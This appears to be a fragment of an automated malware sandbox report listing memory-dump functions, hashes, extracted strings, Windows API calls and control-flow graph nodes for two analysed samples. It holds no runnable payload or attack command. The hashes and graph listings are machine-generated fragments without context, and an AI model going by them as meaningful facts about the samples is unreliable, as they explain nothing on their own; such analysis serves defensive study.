                                                                            • Instruction ID: 7cf1fa2cb2b5c4cc62ddfcbda49dd9a3b62f5da9bb917bcbea2d88fd7d09fe72
                                                                            • Opcode Fuzzy Hash: 22a8f1c66469840082745c944c2aa0fd83b1475a1beabed724104313cf0ba7db
                                                                            • Instruction Fuzzy Hash: 814109600087C18EC726CF298488216BFA16F16224F488ADDD8E54F7DBC375E519CBA2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit
                                                                            • String ID: !$#$($-$0$2$4$7$8$9$?$?$H$V$e
                                                                            • API String ID: 2610073882-164105402
                                                                            • Opcode ID: 039d2b2dfe9c3e5f2f8675ce5e94112336f599acd0fb9780746b486f700134ab
                                                                            • Instruction ID: 95400d1d1d4e850761b801bbbe8b065f72cfa6e0a49880321e91a76c52fed4be
                                                                            • Opcode Fuzzy Hash: 039d2b2dfe9c3e5f2f8675ce5e94112336f599acd0fb9780746b486f700134ab
                                                                            • Instruction Fuzzy Hash: 8041E7600087C1CED726DF2D8488616BFA06F26224F488ADDD8E54F3DBC375E519CBA2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit
                                                                            • String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
                                                                            • API String ID: 2610073882-100263010
                                                                            • Opcode ID: d1bba89620d90134ce5f364f3bfe0ce037c5d6028353c69fb9a18c34dee1acf9
                                                                            • Instruction ID: e0d7915414ade19a35a22f6925b960bfb7bc3a362f74915736a4c8f038314a77
                                                                            • Opcode Fuzzy Hash: d1bba89620d90134ce5f364f3bfe0ce037c5d6028353c69fb9a18c34dee1acf9
                                                                            • Instruction Fuzzy Hash: 2E41D320508B818ED715DF28C488616BFE1AF16314F088A9DD8EA4F797C7B5E519CBA2
                                                                            APIs
                                                                            • VariantClear.OLEAUT32(04EC839E), ref: 00EE733D
                                                                            • VariantInit.OLEAUT32 ref: 00EE734C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit
                                                                            • String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
                                                                            • API String ID: 2610073882-100263010
                                                                            • Opcode ID: 885a00c7e84ae7da989a7025a89a97e93ab19e47f9d502d0f202c93675e0392a
                                                                            • Instruction ID: add468fb5e8eefdc4674ffab718ac38593cdbd1d58e5de5bd931686365f14bc5
                                                                            • Opcode Fuzzy Hash: 885a00c7e84ae7da989a7025a89a97e93ab19e47f9d502d0f202c93675e0392a
                                                                            • Instruction Fuzzy Hash: DE41C220509B818ED715DF28C588616BFE1AF16314F088A8DD8EA4F797C3B5E519CBA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8U!W$AK$D^$I\$L!_#$dE;G
                                                                            • API String ID: 0-1822214113
                                                                            • Opcode ID: 0ed3b3ffed4b9dda1d64e2b210ca4de034a7a3186bd16c0fcd47493ad5fcaa5a
                                                                            • Instruction ID: 673ebe8d19797fb96f4160c0458dd568b9253955d3b194f364782ee9b4f2ca44
                                                                            • Opcode Fuzzy Hash: 0ed3b3ffed4b9dda1d64e2b210ca4de034a7a3186bd16c0fcd47493ad5fcaa5a
                                                                            • Instruction Fuzzy Hash: 56E151B4108344ABD3109F55EA80A1BBBF0FB86B48F50591EF5C9AB351E734C906DBA7
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString
                                                                            • String ID: -$.$/$0$1$3
                                                                            • API String ID: 2525500382-387867814
                                                                            • Opcode ID: c39f40e0917516803280618391005fb3fc42bc0154b0490e8ab2f9a0a2cea849
                                                                            • Instruction ID: 29e6c71550f9853f2d4d63340f95b8f7f37ae5ff5300fe95c3a40c7dd9a5840f
                                                                            • Opcode Fuzzy Hash: c39f40e0917516803280618391005fb3fc42bc0154b0490e8ab2f9a0a2cea849
                                                                            • Instruction Fuzzy Hash: 8B91A060508BC38AC3268B3D8888605FFA16B67234B4887D9E5F55F7E3D360D586C7A6

                                                                            Execution Graph

                                                                            Execution Coverage:7.2%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:29
                                                                            Total number of Limit Nodes:4
                                                                            execution_graph 28077 100d300 DuplicateHandle 28078 100d396 28077->28078 28079 100b020 28080 100b062 28079->28080 28081 100b068 GetModuleHandleW 28079->28081 28080->28081 28082 100b095 28081->28082 28083 1004668 28084 1004684 28083->28084 28085 1004696 28084->28085 28087 10047ab 28084->28087 28088 10047c5 28087->28088 28092 10048b0 28088->28092 28096 10048a7 28088->28096 28094 10048d7 28092->28094 28093 10049b4 28093->28093 28094->28093 28100 1004248 28094->28100 28098 10048d7 28096->28098 28097 10049b4 28098->28097 28099 1004248 CreateActCtxA 28098->28099 28099->28097 28101 1005940 CreateActCtxA 28100->28101 28103 1005a03 28101->28103 28104 100d0b8 28105 100d0fe GetCurrentProcess 28104->28105 28107 100d150 GetCurrentThread 28105->28107 28108 100d149 28105->28108 28109 100d186 28107->28109 28110 100d18d GetCurrentProcess 28107->28110 28108->28107 28109->28110 28111 100d1c3 GetCurrentThreadId 28110->28111 28113 100d21c 28111->28113

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 638 6483f50-6483f84 641 6483f92-6483fa5 638->641 642 6483f86-6483f8f 638->642 643 6483fab-6483fae 641->643 644 6484215-6484219 641->644 642->641 646 6483fbd-6483fc9 643->646 647 6483fb0-6483fb5 643->647 648 648421b-648422b 644->648 649 648422e-6484238 644->649 650 6483fcf-6483fe1 646->650 651 6484253-6484299 646->651 647->646 648->649 656 648414d-648415b 650->656 657 6483fe7-648403a 650->657 658 64842a8-64842d0 651->658 659 648429b-64842a5 651->659 664 64841e0-64841e2 656->664 665 6484161-648416f 656->665 688 648404a 657->688 689 648403c-6484048 call 6483c88 657->689 681 6484425-6484443 658->681 682 64842d6-64842ef 658->682 659->658 668 64841f0-64841fc 664->668 669 64841e4-64841ea 664->669 666 648417e-648418a 665->666 667 6484171-6484176 665->667 666->651 673 6484190-64841bf 666->673 667->666 678 64841fe-648420f 668->678 671 64841ec 669->671 672 64841ee 669->672 671->668 672->668 691 64841d0-64841de 673->691 692 64841c1-64841ce 673->692 678->643 678->644 698 64844ae-64844b8 681->698 699 6484445-6484467 681->699 696 64842f5-648430b 682->696 697 6484406-648441f 682->697 694 648404c-648405c 688->694 689->694 691->644 692->691 704 648405e-6484075 694->704 705 6484077-6484079 694->705 696->697 717 6484311-648435f 696->717 697->681 697->682 719 64844b9-648450a 699->719 720 6484469-6484485 699->720 704->705 709 648407b-6484089 705->709 710 64840c2-64840c4 705->710 709->710 724 648408b-648409d 709->724 713 64840d2-64840e2 710->713 714 64840c6-64840d0 710->714 728 648410d-6484110 713->728 729 64840e4-64840f2 713->729 714->713 727 648411b-6484127 714->727 766 6484389-64843ad 717->766 767 6484361-6484387 717->767 754 648452a-6484568 719->754 755 648450c-6484528 719->755 733 64844a9-64844ac 720->733 738 648409f-64840a1 724->738 739 64840a3-64840a7 724->739 727->678 742 648412d-6484148 727->742 787 6484113 call 64848a8 728->787 788 6484113 call 64848b8 728->788 744 64840f4-6484103 729->744 745 6484105-6484108 729->745 733->698 740 6484493-6484496 733->740 734 6484119 734->727 746 64840ad-64840bc 738->746 739->746 740->719 743 6484498-64844a8 740->743 742->644 743->733 744->727 745->644 746->710 753 6484239-648424c 746->753 753->651 755->754 776 64843df-64843f8 766->776 777 64843af-64843c6 766->777 767->766 780 64843fa 776->780 781 6484403-6484404 776->781 784 64843c8-64843cb 777->784 785 64843d2-64843dd 777->785 780->781 781->697 784->785 785->776 785->777 787->734 788->734
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q
                                                                            • API String ID: 0-1007455737
                                                                            • Opcode ID: e84745b6b6d5af0f87e3e82bd295e57051358ad4f1cd0e45186e03fed017e544
                                                                            • Instruction ID: ebbee189892fface7f0c96b602713b9c9f357f2c7bf4e5012fb9f63144e1e687
                                                                            • Opcode Fuzzy Hash: e84745b6b6d5af0f87e3e82bd295e57051358ad4f1cd0e45186e03fed017e544
                                                                            • Instruction Fuzzy Hash: EE126134B002158FDB55EF78C994A9EBBF6BF89700B15816AE805EB365DB34DC42CB90
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 460502c75ae67c5b93438c929fdaf753dae7385547f92100e87529e0413a6e9b
                                                                            • Instruction ID: e448007e037fee64c649cfc68b98196a4cc492990f86639a59857a95d16318a7
                                                                            • Opcode Fuzzy Hash: 460502c75ae67c5b93438c929fdaf753dae7385547f92100e87529e0413a6e9b
                                                                            • Instruction Fuzzy Hash: C3F1B131A002199FDB55EF68D880B9EBBF6EF44300F15856AE405EB3A5DB34ED45CB90
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4f52c628f543b241bb9f162e9f610b339bc6e0dc2471a01268435ba01beb4b89
                                                                            • Instruction ID: 322661225a052bce8a95c4bae9c6b67c9faaa738ba38fce85e42bea5560aa170
                                                                            • Opcode Fuzzy Hash: 4f52c628f543b241bb9f162e9f610b339bc6e0dc2471a01268435ba01beb4b89
                                                                            • Instruction Fuzzy Hash: 09D1F670900318CFCB18EFB4D844A9DBBB2FF8A305F1085A9D51AAB754DB319986CF11

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 294 6470d80-6470dcb 299 6470dd1-6470dd3 294->299 300 6470efd-6470f10 294->300 301 6470dd6-6470de5 299->301 304 6471006-6471011 300->304 305 6470f16-6470f25 300->305 307 6470e9d-6470ea1 301->307 308 6470deb-6470e1d 301->308 306 6471019-6471022 304->306 314 6470fd1-6470fd5 305->314 315 6470f2b-6470f51 305->315 309 6470ea3-6470eae 307->309 310 6470eb0 307->310 341 6470e26-6470e2d 308->341 342 6470e1f-6470e24 308->342 313 6470eb5-6470eb8 309->313 310->313 313->306 319 6470ebe-6470ec2 313->319 316 6470fd7-6470fe2 314->316 317 6470fe4 314->317 343 6470f53-6470f58 315->343 344 6470f5a-6470f61 315->344 320 6470fe6-6470fe8 316->320 317->320 322 6470ec4-6470ecf 319->322 323 6470ed1 319->323 327 6470fea-6470ff4 320->327 328 6471039-64710b5 320->328 325 6470ed3-6470ed5 322->325 323->325 330 6471025-6471032 325->330 331 6470edb-6470ee5 325->331 336 6470ff7-6471000 327->336 376 64710bb-64710bd 328->376 377 6471189-647119c 328->377 330->328 345 6470ee8-6470ef2 331->345 336->304 336->305 349 6470e52-6470e76 341->349 350 6470e2f-6470e50 341->350 347 6470e91-6470e9b 342->347 348 6470fc5-6470fcf 343->348 351 6470f86-6470faa 344->351 352 6470f63-6470f84 344->352 345->301 353 6470ef8 345->353 347->345 348->336 367 6470e8e 349->367 368 6470e78-6470e7e 349->368 350->347 369 6470fc2 351->369 370 6470fac-6470fb2 351->370 352->348 353->306 367->347 371 6470e82-6470e84 368->371 372 6470e80 368->372 369->348 373 6470fb6-6470fb8 370->373 374 6470fb4 370->374 371->367 372->367 373->369 374->369 378 64710c0-64710cf 376->378 381 6471234-647123f 377->381 382 64711a2-64711b1 377->382 383 64710d1-64710fe 378->383 384 6471129-647112d 378->384 385 6471247-6471250 381->385 391 64711b3-64711dc 382->391 392 64711ff-6471203 382->392 410 6471104-6471106 383->410 386 647112f-647113a 384->386 387 647113c 384->387 390 6471141-6471144 386->390 387->390 390->385 396 647114a-647114e 390->396 414 64711f4-64711fd 391->414 415 64711de-64711e4 391->415 394 6471205-6471210 392->394 395 6471212 392->395 401 6471214-6471216 394->401 395->401 399 6471150-647115b 396->399 400 647115d 396->400 404 647115f-6471161 399->404 400->404 402 6471267-6471294 401->402 403 6471218-6471222 401->403 428 6471296-64712af 402->428 429 64712c4-64712c5 402->429 419 6471225-647122e 403->419 408 6471167-6471171 404->408 409 6471253-6471260 404->409 425 6471174-647117e 408->425 409->402 411 647111e-6471127 410->411 412 6471108-647110e 410->412 411->425 417 6471112-6471114 412->417 418 6471110 412->418 414->419 420 64711e6 415->420 421 64711e8-64711ea 415->421 417->411 418->411 419->381 419->382 420->414 421->414 425->378 430 6471184 425->430 431 64712c7-64712e9 428->431 433 64712b1-64712b7 428->433 429->431 430->385 438 64712ec-64712f0 431->438 435 64712bb-64712bd 433->435 436 64712b9 433->436 435->429 436->431 439 64712f2-64712f7 438->439 440 64712f9-64712fe 438->440 441 6471304-6471307 439->441 440->441 442 647130d-6471322 441->442 443 64714f8-6471500 441->443 442->438 445 6471324 442->445 446 64713e0-6471405 445->446 447 647132b-6471350 445->447 448 6471498-64714b9 445->448 458 6471407-6471409 446->458 459 647140b-647140f 446->459 460 6471356-647135a 447->460 461 6471352-6471354 447->461 452 64714bf-64714f3 448->452 452->438 463 647146d-6471493 458->463 464 6471411-647142e 459->464 465 6471430-6471453 459->465 467 647135c-6471379 460->467 468 647137b-647139e 460->468 466 64713b8-64713db 461->466 463->438 464->463 482 6471455-647145b 465->482 483 647146b 465->483 466->438 467->466 484 64713b6 468->484 485 64713a0-64713a6 468->485 486 647145f-6471461 482->486 487 647145d 482->487 483->463 484->466 488 64713aa-64713ac 485->488 489 64713a8 485->489 486->483 487->483 488->484 489->484
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-2551331179
                                                                            • Opcode ID: 738e128c577ee3e7b5c109e016818a943cb0bd2757b699150bc9d4645a105a75
                                                                            • Instruction ID: 252ed0a7a09e7b398a2d1486bb0fc9e23e40ec70a19ea1234d21cf8103e3bdac
                                                                            • Opcode Fuzzy Hash: 738e128c577ee3e7b5c109e016818a943cb0bd2757b699150bc9d4645a105a75
                                                                            • Instruction Fuzzy Hash: A032A370B002458FDB95DB69C854AAEBBF6FF89704B14846AE906DB3A1CB74DC01CB91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 490 6471582-6471584 491 647158e 490->491 492 6471598-64715af 491->492 493 64715b5-64715b7 492->493 494 64715cf-64715f1 493->494 495 64715b9-64715bf 493->495 500 6471638-647163f 494->500 496 64715c3-64715c5 495->496 497 64715c1 495->497 496->494 497->494 501 6471645-6471747 500->501 502 6471571-6471580 500->502 502->490 505 64715f3-64715f7 502->505 506 6471606 505->506 507 64715f9-6471604 505->507 509 647160b-647160e 506->509 507->509 509->501 512 6471610-6471614 509->512 513 6471616-6471621 512->513 514 6471623 512->514 515 6471625-6471627 513->515 514->515 517 647162d-6471637 515->517 518 647174a-6471775 515->518 517->500 524 6471777-6471784 518->524 525 6471786-64717a7 518->525 524->525 527 64717bf-64717e1 525->527 528 64717a9-64717af 525->528 533 64717e4-64717e8 527->533 529 64717b3-64717b5 528->529 530 64717b1 528->530 529->527 530->527 534 64717f1-64717f6 533->534 535 64717ea-64717ef 533->535 536 64717fc-64717ff 534->536 535->536 537 6471805-647181a 536->537 538 6471abf-6471ac7 536->538 537->533 540 647181c 537->540 541 6471a07-6471a2c 540->541 542 6471823-64718d3 540->542 543 6471990-64719bd 540->543 544 64718d8-647198b 540->544 557 6471a32-6471a36 541->557 558 6471a2e-6471a30 541->558 542->533 563 6471b36-6471b71 543->563 564 64719c3-64719cd 543->564 544->533 565 6471a57-6471a7a 557->565 566 6471a38-6471a55 557->566 562 6471a94-6471aba 558->562 562->533 569 64719d3-6471a02 564->569 570 6471b00-6471b2f 564->570 586 6471a92 565->586 587 6471a7c-6471a82 565->587 566->562 569->533 570->563 586->562 589 6471a86-6471a88 587->589 590 6471a84 587->590 589->586 590->586
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-3723351465
                                                                            • Opcode ID: 0cbafb742ba5d092e6b44619b564742bea58195b29b78642daf8ec7fba94c37a
                                                                            • Instruction ID: 84fac6bca74fa4925902c638ea417176be6a1fe17cc7e5f693cf6e07b05c6f12
                                                                            • Opcode Fuzzy Hash: 0cbafb742ba5d092e6b44619b564742bea58195b29b78642daf8ec7fba94c37a
                                                                            • Instruction Fuzzy Hash: 0FC1D4347002458FDB599BB8C894AAF7BF6EF89704F18886AD5028B3A1DF79DC05C791

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 595 100d0b8-100d147 GetCurrentProcess 599 100d150-100d184 GetCurrentThread 595->599 600 100d149-100d14f 595->600 601 100d186-100d18c 599->601 602 100d18d-100d1c1 GetCurrentProcess 599->602 600->599 601->602 603 100d1c3-100d1c9 602->603 604 100d1ca-100d1e2 602->604 603->604 608 100d1eb-100d21a GetCurrentThreadId 604->608 609 100d223-100d285 608->609 610 100d21c-100d222 608->610 610->609
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0100D136
                                                                            • GetCurrentThread.KERNEL32 ref: 0100D173
                                                                            • GetCurrentProcess.KERNEL32 ref: 0100D1B0
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0100D209
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2925184828.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_1000000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 8c3114bfaba0172d023299c3682e3cb6259099de7f7daba0689e82f806325f75
                                                                            • Instruction ID: 9f43324a1378189cf6f0a9d64390fc968627d6154655fb34a4456bc19640ef06
                                                                            • Opcode Fuzzy Hash: 8c3114bfaba0172d023299c3682e3cb6259099de7f7daba0689e82f806325f75
                                                                            • Instruction Fuzzy Hash: DB5158B09003099FEB54DFAAD588BDEBBF1FF48314F208459E159A73A0DB389944CB65

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 789 6470598-64705c7 791 6470ad7-6470d2e 789->791 792 64705cd-64705fd 789->792 800 6470138-6470145 792->800 803 647014b-6470160 800->803 804 647076a-6470774 800->804 803->800 808 6470162 803->808 809 6470337 808->809 810 64702c4-64702f2 808->810 811 6470422-6470445 808->811 812 6470512-6470535 808->812 813 6470251-647027f 808->813 814 64701de 808->814 815 64703aa-64703cd 808->815 816 647049a-64704bd 808->816 817 6470169-647018c 808->817 820 6470341-647035d 809->820 844 64702f4-64702fa 810->844 845 647030a-6470332 810->845 861 64708bb-64708ea 811->861 862 647044b-647044f 811->862 863 64709ff-6470a2e 812->863 864 647053b-647053f 812->864 846 6470297-64702bf 813->846 847 6470281-6470287 813->847 825 64701e8-6470204 814->825 869 64703d3-64703d7 815->869 870 6470819-6470848 815->870 871 64704c3-64704c7 816->871 872 647095d-647098c 816->872 873 6470777-64707a6 817->873 874 6470192-6470196 817->874 830 6470363-6470365 820->830 835 647020a-647020c 825->835 842 6470367-647036d 830->842 843 647037d-64703a5 830->843 839 6470224-647024c 835->839 840 647020e-6470214 835->840 839->800 850 6470216 840->850 851 6470218-647021a 840->851 852 6470371-6470373 842->852 853 647036f 842->853 843->800 859 64702fe-6470300 844->859 860 64702fc 844->860 845->800 846->800 854 647028b-647028d 847->854 855 6470289 847->855 850->839 851->839 852->843 853->843 854->846 855->846 859->845 860->845 887 64708f1-6470920 861->887 876 6470927-6470956 862->876 877 6470455-647045f 862->877 888 6470a35-6470a64 863->888 878 6470545-647054f 864->878 879 6470a6b-6470ad0 864->879 880 6470885-64708b4 869->880 881 64703dd-64703e7 869->881 897 647084f-647087e 870->897 882 64704cd-64704d7 871->882 883 64709c9-64709f8 871->883 899 6470993-64709c2 872->899 902 64707ad-64707dc 873->902 884 64707e3-6470812 874->884 885 647019c-64701a6 874->885 876->872 886 6470465-6470495 877->886 877->887 878->888 889 6470555-6470585 878->889 879->791 880->861 881->897 898 64703ed-647041d 881->898 882->899 900 64704dd-647050d 882->900 883->863 884->870 885->902 903 64701ac-64701d9 885->903 886->800 887->876 888->879 889->800 897->880 898->800 899->883 900->800 902->884 903->800
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: dlPj
                                                                            • API String ID: 0-3272693790
                                                                            • Opcode ID: 73ecdb15269557c3acbb6d44e5260b6758b53a642c51c2d8fc2d3819d4f83477
                                                                            • Instruction ID: ed0e803fff19afa5d723e8c945111e912f18ca3cfabc63dbf3bd5c81648272a8
                                                                            • Opcode Fuzzy Hash: 73ecdb15269557c3acbb6d44e5260b6758b53a642c51c2d8fc2d3819d4f83477
                                                                            • Instruction Fuzzy Hash: 5902DD707407148FDB659F64D854A6EBBB6FF89B04F014859D5028B3A1CF7AEC09CB92

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 997 1004248-1005a01 CreateActCtxA 1000 1005a03-1005a09 997->1000 1001 1005a0a-1005a64 997->1001 1000->1001 1008 1005a73-1005a77 1001->1008 1009 1005a66-1005a69 1001->1009 1010 1005a88 1008->1010 1011 1005a79-1005a85 1008->1011 1009->1008 1013 1005a89 1010->1013 1011->1010 1013->1013
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 010059F1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2925184828.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_1000000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: a6a25230a1850b47f8d1923c5300d146c52da070b1d5fd9bf51f58b1c454655e
                                                                            • Instruction ID: 4fda9205593994fbca11434c7d1c16f326510ee1eba57aedc14a303c51c91a12
                                                                            • Opcode Fuzzy Hash: a6a25230a1850b47f8d1923c5300d146c52da070b1d5fd9bf51f58b1c454655e
                                                                            • Instruction Fuzzy Hash: 5041F2B0C00719CAEB25DFA9C884B9DBBF5FF49304F20806AD409AB291DB756945CF91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1014 100593b-100593e 1015 1005940-1005a01 CreateActCtxA 1014->1015 1017 1005a03-1005a09 1015->1017 1018 1005a0a-1005a64 1015->1018 1017->1018 1025 1005a73-1005a77 1018->1025 1026 1005a66-1005a69 1018->1026 1027 1005a88 1025->1027 1028 1005a79-1005a85 1025->1028 1026->1025 1030 1005a89 1027->1030 1028->1027 1030->1030
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 010059F1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.2925184828.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_1000000_hjhTHr6fWy.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: b2551eae13da807867dbcddc354aa692dec4f6b5cc56f9578fc177e4b9f725d4
                                                                            • Instruction ID: 51880cc61ccbf071c183b128530d191128f5c4e2c0d596274f5ea8dd736b32de
                                                                            • Opcode Fuzzy Hash: b2551eae13da807867dbcddc354aa692dec4f6b5cc56f9578fc177e4b9f725d4
                                                                            • Instruction Fuzzy Hash: ED41F3B0C00719CEEB25DFA9C884B9DBBF5FF49304F20805AD448AB251DB75698ACF91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1031 100d300-100d394 DuplicateHandle 1032 100d396-100d39c 1031->1032 1033 100d39d-100d3ba 1031->1033 1032->1033
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D387
                                                                            Memory Dump Source
